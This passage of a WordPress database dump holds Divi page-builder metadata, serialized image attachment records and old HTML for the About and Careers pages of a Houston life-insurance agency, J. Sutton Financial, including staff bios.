pb_enable_shortcode_tracking',''),(35,10,'_et_pb_ab_current_shortcode','[et_pb_split_track id=\"10\" /]'),(36,10,'_et_pb_custom_css',''),(37,10,'_et_pb_gutter_width','3'),(38,10,'_thumbnail_id','0'),(39,10,'_global_colors_info','{}'),(40,10,'_et_pb_first_image',''),(41,10,'_et_pb_truncate_post',''),(42,10,'_et_pb_truncate_post_date',''),(43,10,'_et_builder_version','VB|Divi|4.20.2'),(426,26,'_et_pb_show_page_creation','off'),(53,25,'_et_autogenerated_title','0'),(54,25,'_et_default','1'),(55,25,'_et_enabled','1'),(56,25,'_et_header_layout_id','528'),(57,25,'_et_header_layout_enabled','1'),(58,25,'_et_body_layout_id','0'),(59,25,'_et_body_layout_enabled','1'),(60,25,'_et_footer_layout_id','523'),(61,25,'_et_footer_layout_enabled','1'),(2018,24,'_et_template','25'),(66,12,'_et_theme_builder_marked_as_unused','2023-02-28 13:30:26'),(104,38,'_et_pb_first_image',''),(105,38,'_et_pb_truncate_post',''),(100,38,'_wp_page_template','default'),(101,38,'_et_pb_post_hide_nav','default'),(102,38,'_et_pb_page_layout','et_no_sidebar'),(68,26,'_edit_last','3'),(69,26,'_edit_lock','1681249286:3'),(1819,470,'_wp_attached_file','2023/03/About-American-Life-Insurance-Muted-scaled.jpg'),(1820,470,'_wp_attachment_metadata','a:8:{s:5:\"width\";i:2560;s:6:\"height\";i:705;s:4:\"file\";s:54:\"2023/03/About-American-Life-Insurance-Muted-scaled.jpg\";s:8:\"filesize\";i:143052;s:5:\"sizes\";a:16:{s:6:\"medium\";a:5:{s:4:\"file\";s:46:\"About-American-Life-Insurance-Muted-300x83.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:83;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17807;}s:5:\"large\";a:5:{s:4:\"file\";s:48:\"About-American-Life-Insurance-Muted-1024x282.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:282;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:41468;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:47:\"About-American-Life-Insurance-Muted-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16571;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:47:\"About-American-Life-Insurance-Muted-768x212.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31454;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:48:\"About-American-Life-Insurance-Muted-1536x423.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:423;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:66393;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:48:\"About-American-Life-Insurance-Muted-2048x564.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:564;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:99848;}s:21:\"et-pb-post-main-image\";a:5:{s:4:\"file\";s:47:\"About-American-Life-Insurance-Muted-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23163;}s:31:\"et-pb-post-main-image-fullwidth\";a:5:{s:4:\"file\";s:48:\"About-American-Life-Insurance-Muted-1080x675.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:62690;}s:21:\"et-pb-portfolio-image\";a:5:{s:4:\"file\";s:47:\"About-American-Life-Insurance-Muted-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24238;}s:28:\"et-pb-portfolio-module-image\";a:5:{s:4:\"file\";s:47:\"About-American-Life-Insurance-Muted-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:30031;}s:28:\"et-pb-portfolio-image-single\";a:5:{s:4:\"file\";s:48:\"About-American-Life-Insurance-Muted-1080x297.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:297;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:43907;}s:35:\"et-pb-gallery-module-image-portrait\";a:5:{s:4:\"file\";s:47:\"About-American-Life-Insurance-Muted-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28615;}s:37:\"et-pb-post-main-image-fullwidth-large\";a:5:{s:4:\"file\";s:49:\"About-American-Life-Insurance-Muted-2880x1072.jpg\";s:5:\"width\";i:2880;s:6:\"height\";i:1072;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:251000;}s:32:\"et-pb-image--responsive--desktop\";a:5:{s:4:\"file\";s:48:\"About-American-Life-Insurance-Muted-1280x353.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:353;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:53208;}s:31:\"et-pb-image--responsive--tablet\";a:5:{s:4:\"file\";s:47:\"About-American-Life-Insurance-Muted-980x270.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:270;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:39540;}s:30:\"et-pb-image--responsive--phone\";a:5:{s:4:\"file\";s:47:\"About-American-Life-Insurance-Muted-480x132.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:132;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22202;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:24:\"saksit - stock.adobe.com\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:74:\"Happy family mother father and daughter walk on nature on sunset hold hand\";s:17:\"created_timestamp\";s:10:\"1517431493\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:64:\"Happy family mother father and daughter walk on nature on sunset\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:50:{i:0;s:7:\"romance\";i:1;s:8:\"romantic\";i:2;s:12:\"togetherness\";i:3;s:12:\"relationship\";i:4;s:9:\"valentine\";i:5;s:7:\"husband\";i:6;s:3:\"fun\";i:7;s:6:\"summer\";i:8;s:13:\"holding hands\";i:9;s:5:\"happy\";i:10;s:11:\"grandfather\";i:11;s:12:\"family happy\";i:12;s:6:\"family\";i:13;s:9:\"happiness\";i:14;s:8:\"daughter\";i:15;s:6:\"father\";i:16;s:4:\"park\";i:17;s:8:\"together\";i:18;s:5:\"grass\";i:19;s:6:\"little\";i:20;s:6:\"mother\";i:21;s:5:\"young\";i:22;s:6:\"nature\";i:23;s:5:\"child\";i:24;s:8:\"outdoors\";i:25;s:4:\"girl\";i:26;s:9:\"caucasian\";i:27;s:7:\"holding\";i:28;s:7:\"concept\";i:29;s:4:\"hand\";i:30;s:7:\"parents\";i:31;s:5:\"woman\";i:32;s:6:\"parent\";i:33;s:10:\"generation\";i:34;s:3:\"day\";i:35;s:4:\"love\";i:36;s:6:\"couple\";i:37;s:6:\"meadow\";i:38;s:7:\"outdoor\";i:39;s:5:\"light\";i:40;s:6:\"lovely\";i:41;s:4:\"view\";i:42;s:3:\"dad\";i:43;s:6:\"sunset\";i:44;s:4:\"walk\";i:45;s:4:\"back\";i:46;s:3:\"joy\";i:47;s:3:\"sun\";i:48;s:9:\"beautiful\";i:49;s:4:\"rear\";}}s:14:\"original_image\";s:39:\"About-American-Life-Insurance-Muted.jpg\";s:7:\"optimus\";a:3:{s:6:\"profit\";s:2:\"82\";s:8:\"quantity\";d:88;s:4:\"webp\";i:0;}}'),(1821,471,'_wp_attached_file','2023/03/Contract-Icon-Grey-Background.png'),(1822,471,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:5000;s:6:\"height\";i:5000;s:4:\"file\";s:41:\"2023/03/Contract-Icon-Grey-Background.png\";s:8:\"filesize\";i:403475;s:5:\"sizes\";a:16:{s:6:\"medium\";a:5:{s:4:\"file\";s:41:\"Contract-Icon-Grey-Background-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:9522;}s:5:\"large\";a:5:{s:4:\"file\";s:43:\"Contract-Icon-Grey-Background-1024x1024.png\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:36425;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:41:\"Contract-Icon-Grey-Background-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4573;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:41:\"Contract-Icon-Grey-Background-768x768.png\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:26567;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:43:\"Contract-Icon-Grey-Background-1536x1536.png\";s:5:\"width\";i:1536;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:58188;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:43:\"Contract-Icon-Grey-Background-2048x2048.png\";s:5:\"width\";i:2048;s:6:\"height\";i:2048;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:82551;}s:21:\"et-pb-post-main-image\";a:5:{s:4:\"file\";s:41:\"Contract-Icon-Grey-Background-400x250.png\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:8084;}s:31:\"et-pb-post-main-image-fullwidth\";a:5:{s:4:\"file\";s:42:\"Contract-Icon-Grey-Background-1080x675.png\";s:5:\"width\";i:1080;s:6:\"height\";i:675;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:24595;}s:21:\"et-pb-portfolio-image\";a:5:{s:4:\"file\";s:41:\"Contract-Icon-Grey-Background-400x284.png\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:9801;}s:28:\"et-pb-portfolio-module-image\";a:5:{s:4:\"file\";s:41:\"Contract-Icon-Grey-Background-510x382.png\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:13586;}s:28:\"et-pb-portfolio-image-single\";a:5:{s:4:\"file\";s:43:\"Contract-Icon-Grey-Background-1080x1080.png\";s:5:\"width\";i:1080;s:6:\"height\";i:1080;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:38986;}s:35:\"et-pb-gallery-module-image-portrait\";a:5:{s:4:\"file\";s:41:\"Contract-Icon-Grey-Background-400x516.png\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:13413;}s:37:\"et-pb-post-main-image-fullwidth-large\";a:5:{s:4:\"file\";s:43:\"Contract-Icon-Grey-Background-2880x1800.png\";s:5:\"width\";i:2880;s:6:\"height\";i:1800;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:80545;}s:32:\"et-pb-image--responsive--desktop\";a:5:{s:4:\"file\";s:43:\"Contract-Icon-Grey-Background-1280x1280.png\";s:5:\"width\";i:1280;s:6:\"height\";i:1280;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:46952;}s:31:\"et-pb-image--responsive--tablet\";a:5:{s:4:\"file\";s:41:\"Contract-Icon-Grey-Background-980x980.png\";s:5:\"width\";i:980;s:6:\"height\";i:980;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:34221;}s:30:\"et-pb-image--responsive--phone\";a:5:{s:4:\"file\";s:41:\"Contract-Icon-Grey-Background-480x480.png\";s:5:\"width\";i:480;s:6:\"height\";i:480;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:15577;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:7:\"optimus\";a:3:{s:6:\"profit\";s:2:\"16\";s:8:\"quantity\";d:94;s:4:\"webp\";i:0;}}'),(82,26,'_wp_page_template','default'),(83,26,'_et_pb_post_hide_nav','default'),(84,26,'_et_pb_page_layout','et_right_sidebar'),(85,26,'_et_pb_side_nav','off'),(87,26,'_et_pb_use_builder','on'),(88,26,'_et_pb_first_image',''),(89,26,'_et_pb_truncate_post',''),(90,26,'_et_pb_truncate_post_date',''),(91,26,'_et_pb_old_content','<div id=\"comp-l7tp3rv01\" class=\"KcpHeO tz5f0K comp-l7tp3rv01 wixui-text\" data-testid=\"richTextElement\">\r\n<h2 class=\"font_5\" style=\"text-align: center;\">Get to Know Us</h2>\r\n</div>\r\n<div id=\"comp-l7tp3rv4\" class=\"KcpHeO tz5f0K comp-l7tp3rv4 wixui-text\" data-testid=\"richTextElement\">\r\n<p class=\"font_7\" style=\"text-align: center;\">J. Sutton Financial was founded in 2022 with a vision to extend career opportunities beyond its home city.</p>\r\n<p class=\"font_7\" style=\"text-align: center;\">We service clients and work as a team</p>\r\n<p class=\"font_7\" style=\"text-align: center;\">at our home office in Houston as well as 100% remote. This allows us to have an incredible office culture and service more clients with an agent reach from coast-to-coast.</p>\r\n\r\n<h2 class=\"font_5\" style=\"text-align: center;\">Partners</h2>\r\n<div id=\"comp-l6v9yz79\" class=\"BaOVQ8 tz5f0K comp-l6v9yz79 wixui-text\" data-testid=\"richTextElement\">\r\n<p class=\"font_8\" style=\"text-align: center;\"><em><strong><span class=\"color_15\">Trusted and Endorsed</span></strong></em></p>\r\n\r\n</div>\r\n<div id=\"comp-l6v9yz791\" class=\"KcpHeO tz5f0K comp-l6v9yz791 wixui-text\" data-testid=\"richTextElement\">\r\n<p class=\"font_9\" style=\"text-align: center;\"><span class=\"color_15\">J. Sutton Financial believes in delivering a wonderful experience, enterprise professionalism, and real results. Step one to our success has always been putting our clients first. We\'re always looking to grow with the right people. Take a look below to learn more about our partners and how you, too, can join our incredible team!</span></p>\r\n\r\n</div>\r\n</div>\r\n<div id=\"comp-l7tp3rv4\" class=\"KcpHeO tz5f0K comp-l7tp3rv4 wixui-text\" data-testid=\"richTextElement\">\r\n\r\n<img class=\"aligncenter size-medium wp-image-29\" src=\"http://cmdev-site1.com/wp-content/uploads/2023/02/justinsuttonheadshotsmall-Black-White-300x284.png\" alt=\"\" width=\"300\" height=\"284\" />\r\n<div id=\"comp-l6v9yz7a\" class=\"KcpHeO tz5f0K comp-l6v9yz7a wixui-text\" data-testid=\"richTextElement\">\r\n<p class=\"font_6\" style=\"text-align: center;\"><span class=\"color_15\"><strong>Justin Sutton</strong>\r\n</span>Owner/Founder</p>\r\n\r\n</div>\r\n<div id=\"comp-l6v9yz7a1\" class=\"KcpHeO tz5f0K comp-l6v9yz7a1 wixui-text\" data-testid=\"richTextElement\">\r\n<p class=\"font_8\" style=\"text-align: center;\"><span class=\"color_15\">Justin has worked in the financial services industry for over 8 years. In 2016 the Giddens Nation was formed, where Justin worked alongside brothers Ryan and Stephen, running a satellite office in Waco, TX, and eventually becoming the Senior Regional Director of the Giddens-Giddens Agency. In 2022 Justin formed J. Sutton Financial to extend the reach of the Giddens-Giddens agency into the 100% remote hemisphere of the Fin</span><span class=\"color_15\">ancial Services Industry.</span></p>\r\n\r\n\r\n</div>\r\n<img class=\"aligncenter size-medium wp-image-30\" src=\"http://cmdev-site1.com/wp-content/uploads/2023/02/sethheadshot-Black-White-273x300.png\" alt=\"\" width=\"273\" height=\"300\" />\r\n\r\n</div>\r\n<div id=\"comp-l6v9yz7b2\" class=\"KcpHeO tz5f0K comp-l6v9yz7b2 wixui-text\" data-testid=\"richTextElement\">\r\n<p class=\"font_6\" style=\"text-align: center;\"><span class=\"color_15\"><strong>Seth Ordeneaux</strong>\r\n</span>Managing Director</p>\r\n\r\n</div>\r\n<div id=\"comp-l6v9yz7c\" class=\"KcpHeO tz5f0K comp-l6v9yz7c wixui-text\" data-testid=\"richTextElement\">\r\n<p class=\"font_8\" style=\"text-align: center;\"><span class=\"color_15\">Since Starting with the company in April 2020, Seth has had the opportunity to learn from and develop some of the top leaders in our company. His ability to build relationships with his clients and colleagues has led him to become one of the Top managers in our industry, with several notable accomplishments from top representative to top manager in a very short amount of time.</span></p>\r\n\r\n\r\n</div>\r\n<img class=\"aligncenter size-medium wp-image-31\" src=\"http://cmdev-site1.com/wp-content/uploads/2023/02/F588F955-17B7-46C3-AE39-F6F2077500AE_edited_edited-Black-White-300x292.png\" alt=\"\" width=\"300\" height=\"292\" />\r\n<div id=\"comp-l6v9yz7d\" class=\"KcpHeO tz5f0K comp-l6v9yz7d wixui-text\" data-testid=\"richTextElement\">\r\n<p class=\"font_6\" style=\"text-align: center;\"><span class=\"color_15\"><strong>Matthew Sutton</strong>\r\n</span>Managing Director</p>\r\n\r\n</div>\r\n<div id=\"comp-l6v9yz7d1\" class=\"KcpHeO tz5f0K comp-l6v9yz7d1 wixui-text\" data-testid=\"richTextElement\">\r\n<p class=\"font_8\" style=\"text-align: center;\"><span class=\"color_15\">Matthew\'s career has been nothing short of incredible. With just 5 years in the financial services industry, Matthew has accomplished achievement after achievement. In recent years he has won two separate contests (March Madness/Battle of the Nation), and if that wasn\'t enough, he also leads one of the most powerful teams in our industry.</span></p>\r\n\r\n\r\n<img class=\"aligncenter size-medium wp-image-32\" src=\"http://cmdev-site1.com/wp-content/uploads/2023/02/322630_f5d4b3c18c504cd7a2cadd94a2a0cf51_mv2-Black-White-300x293.png\" alt=\"\" width=\"300\" height=\"293\" />\r\n<p style=\"text-align: center;\"><strong>Andres Cano</strong>\r\nManaging Director</p>\r\n<p style=\"text-align: center;\">Andres\' career with J. Sutton Financial started in the middle of the pandemic. As a recent college graduate from the University of Texas at El Paso, Andres found an opportunity to excel within a troubling job market at J. Sutton Financial. Andres is currently working with his team on the expansion of our Latino Division.</p>\r\n\r\n\r\n<hr />\r\n\r\n\r\n\r\n<hr />\r\n\r\n</div>'),(106,38,'_et_pb_truncate_post_date',''),(97,38,'_edit_last','1'),(98,38,'_edit_lock','1681249169:3'),(107,38,'_et_pb_old_content','<p><!-- wp:heading {\"textAlign\":\"center\"} --></p>\r\n<p><span style=\"background-color: #ffff99;\">BOTTOM OF PAGE: The layout and verbiage are a go. I pulled the photos. They each have a title that matches the job description below.</span></p>\r\n<p> </p>\r\n<h1 class=\"has-text-align-center\" style=\"text-align: center;\">Grow Your Future With Us</h1>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph {\"align\":\"center\"} -->\r\n<h2 style=\"text-align: center;\">Interested in starting your career path and joining our team? <a>Let\'s Talk! </a></h2>\r\n<p>Some insurance companies only care about making money from their insurance policies. But at J. Sutton, we care about people. And Agents who choose to sell our life insurance have an opportunity to make an impact on their clients, their community, their family, and their career. There’s way more to it than meets the eye.</p>\r\n<p>J. Sutton Financial attracts a select group of leaders, entrepreneurs, and high achievers eager to jumpstart their sales careers with a fast-paced and stable company.</p>\r\n<h2 style=\"text-align: center;\">Opportunity <strong>Unlimited</strong></h2>\r\n<p>At J. Sutton Financial, \'Opportunity Unlimited\' means you decide what you are worth. As an independent contractor, you are in control. Your performance determines how much money you make and how far you take your career. Selling our products gives you the opportunity to earn as much as you desire.</p>\r\n<p class=\"has-text-align-center\" style=\"text-align: center;\">Learn about our available openings and how you can join our team today!</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p> </p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:image {\"id\":43,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\r\n<figure class=\"wp-block-image size-large\"><img class=\"wp-image-43\" src=\"http://cmdev-site1.com/wp-content/uploads/2023/02/Careers-Photo-No-Background-1024x443.png\" alt=\"\" /></figure>\r\n<!-- /wp:image -->\r\n\r\n<!-- wp:paragraph --><!-- /wp:paragraph -->\r\n\r\n<!-- wp:heading {\"textAlign\":\"center\"} -->\r\n<h2 class=\"has-text-align-center\" style=\"text-align: center;\"> </h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph {\"align\":\"center\"} --><!-- /wp:paragraph -->'),(113,38,'_et_pb_custom_css',''),(114,38,'_et_pb_gutter_width','3'),(96,38,'_et_pb_use_builder','on'),(95,38,'classic-editor-remember','classic-editor'),(103,38,'_et_pb_side_nav','off'),(110,38,'_et_pb_ab_subjects',''),(111,38,'_et_pb_enable_shortcode_tracking',''),(112,38,'_et_pb_ab_current_shortcode','[et_pb_split_track id=\"38\" /]'),(109,38,'_et_pb_built_for_post_type','page'),(116,38,'_global_colors_info','{}'),(117,38,'_et_builder_version','VB|Divi|4.20.4'),(154,38,'_et_gb_content_width','1080'),(3142,333,'_et_dynamic_cached_shortcodes','a:6:{i:0;s:13:\"et_pb_section\";i:1;s:9:\"et_pb_row\";i:2;s:12:\"et_pb_column\";i:30;s:11:\"et_pb_image\";i:33;s:10:\"et_pb_menu\";i:49;s:10:\"et_pb_text\";}'),(3143,333,'_et_builder_dynamic_assets_loading_attr_threshold','4'),(3144,333,'_et_dynamic_cached_attributes','a:0:{}'),(3145,333,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:1:{s:15:\"et-gf-open-sans\";s:94:\"Open+Sans:300,regular,500,600,700,800,300italic,italic,500italic,600italic,700italic,800italic\";}s:6:\"subset\";a:8:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:9:\"greek-ext\";i:4;s:6:\"hebrew\";i:5;s:5:\"latin\";i:6;s:9:\"latin-ext\";i:7;s:10:\"vietnamese\";}s:9:\"cache_key\";s:69:\"{\"gph\":0,\"divi\":\"4.20.4\",\"wp\":\"6.2\",\"enable_all_character_sets\":\"on\"}\";}'),(3108,26,'_thumbnail_id','0'),(3199,138,'_et_dynamic_cached_shortcodes','a:8:{i:0;s:13:\"et_pb_section\";i:1;s:9:\"et_pb_row\";i:2;s:12:\"et_pb_column\";i:10;s:12:\"et_pb_button\";i:12;s:10:\"et_pb_code\";i:30;s:11:\"et_pb_image\";i:33;s:10:\"et_pb_menu\";i:49;s:10:\"et_pb_text\";}'),(3200,138,'_et_dynamic_cached_attributes','a:0:{}'),(3201,138,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:1:{s:15:\"et-gf-open-sans\";s:94:\"Open+Sans:300,regular,500,600,700,800,300italic,italic,500italic,600italic,700italic,800italic\";}s:6:\"subset\";a:8:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:9:\"greek-ext\";i:4;s:6:\"hebrew\";i:5;s:5:\"latin\";i:6;s:9:\"latin-ext\";i:7;s:10:\"vietnamese\";}s:9:\"cache_key\";s:69:\"{\"gph\":0,\"divi\":\"4.20.4\",\"wp\":\"6.2\",\"enable_all_character_sets\":\"on\"}\";}'),(3202,138,'_et_builder_module_features_cache','a:2:{i:0;s:53:\"{\"gph\":0,\"divi\":\"4.20.4\",\"wp\":\"6.2\",\"tb\":[],\"wpe\":[]}\";i:1;a:36:{s:46:\"et_pb_section_d3d42754626c31849115acc5fda16b26\";a:5:{s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:42:\"et_pb_row_618086ff607bdb21d9bd66ac5d34d7b9\";a:5:{s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:45:\"et_pb_column_0631c140be216de36055bda4ddb4903b\";a:3:{s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:43:\"et_pb_menu_ba86127a81b86eede3932cdc60d5f0a0\";a:9:{s:4:\"glde\";a:4:{s:15:\"background_size\";s:5:\"cover\";s:19:\"background_position\";s:6:\"center\";s:17:\"background_repeat\";s:9:\"no-repeat\";s:16:\"background_blend\";s:6:\"normal\";}s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:42:\"et_pb_row_e506abe2c72c9efaf068d1a321b0116c\";a:3:{s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:4:\"anim\";b:1;}s:43:\"et_pb_text_b18fc41e9534845522cd0dc95ada9aaa\";a:9:{s:4:\"glde\";a:10:{s:14:\"text_font_size\";s:2:\"14\";s:19:\"text_letter_spacing\";s:3:\"0px\";s:16:\"text_line_height\";s:5:\"1.7em\";s:16:\"header_font_size\";s:4:\"30px\";s:21:\"header_letter_spacing\";s:3:\"0px\";s:18:\"header_line_height\";s:3:\"1em\";s:15:\"background_size\";s:5:\"cover\";s:19:\"background_position\";s:6:\"center\";s:17:\"background_repeat\";s:9:\"no-repeat\";s:16:\"background_blend\";s:6:\"normal\";}s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:42:\"et_pb_row_2a811c9ff1f94e46ecf316b3456f182d\";a:5:{s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:45:\"et_pb_column_12a7b86c8446077ea086b8981943aec1\";a:3:{s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:45:\"et_pb_button_7c43e46acefe597cdf3766cdaaa69654\";a:7:{s:4:\"tesh\";b:1;s:4:\"cuma\";b:1;s:3:\"but\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:45:\"et_pb_button_bd1d19c54b982ff23c112321df891f4e\";a:7:{s:4:\"tesh\";b:1;s:4:\"cuma\";b:1;s:3:\"but\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:46:\"et_pb_section_c88596a81dd9b8ca47bd631c1e0049aa\";a:3:{s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:4:\"anim\";b:1;}s:42:\"et_pb_row_5ecf068751a89c17f136c03c0eabb78a\";a:3:{s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:4:\"anim\";b:1;}s:45:\"et_pb_column_2cf8373bc127fdf592641fe87c4fce27\";a:3:{s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:54:\"dsm_perspective_image_55145ae74e9e963793fc4ea77a8f3876\";a:6:{s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:45:\"et_pb_column_9e899f8b1b54c980afb190df011d94e3\";a:3:{s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:43:\"et_pb_text_8a245eb6c3ad0681a0d44621707b8f8e\";a:9:{s:4:\"glde\";a:10:{s:14:\"text_font_size\";s:2:\"14\";s:19:\"text_letter_spacing\";s:3:\"0px\";s:16:\"text_line_height\";s:5:\"1.7em\";s:16:\"header_font_size\";s:4:\"30px\";s:21:\"header_letter_spacing\";s:3:\"0px\";s:18:\"header_line_height\";s:3:\"1em\";s:15:\"background_size\";s:5:\"cover\";s:19:\"background_position\";s:6:\"center\";s:17:\"background_repeat\";s:9:\"no-repeat\";s:16:\"background_blend\";s:6:\"normal\";}s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:43:\"et_pb_text_48e9b0ed1ec15d5fbf0182432d47017c\";a:9:{s:4:\"glde\";a:10:{s:14:\"text_font_size\";s:2:\"14\";s:19:\"text_letter_spacing\";s:3:\"0px\";s:16:\"text_line_height\";s:5:\"1.7em\";s:16:\"header_font_size\";s:4:\"30px\";s:21:\"header_letter_spacing\";s:3:\"0px\";s:18:\"header_line_height\";s:3:\"1em\";s:15:\"background_size\";s:5:\"cover\";s:19:\"background_position\";s:6:\"center\";s:17:\"background_repeat\";s:9:\"no-repeat\";s:16:\"background_blend\";s:6:\"normal\";}s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:43:\"dsm_button_ac4a5062f457f94554db7a296585f71e\";a:8:{s: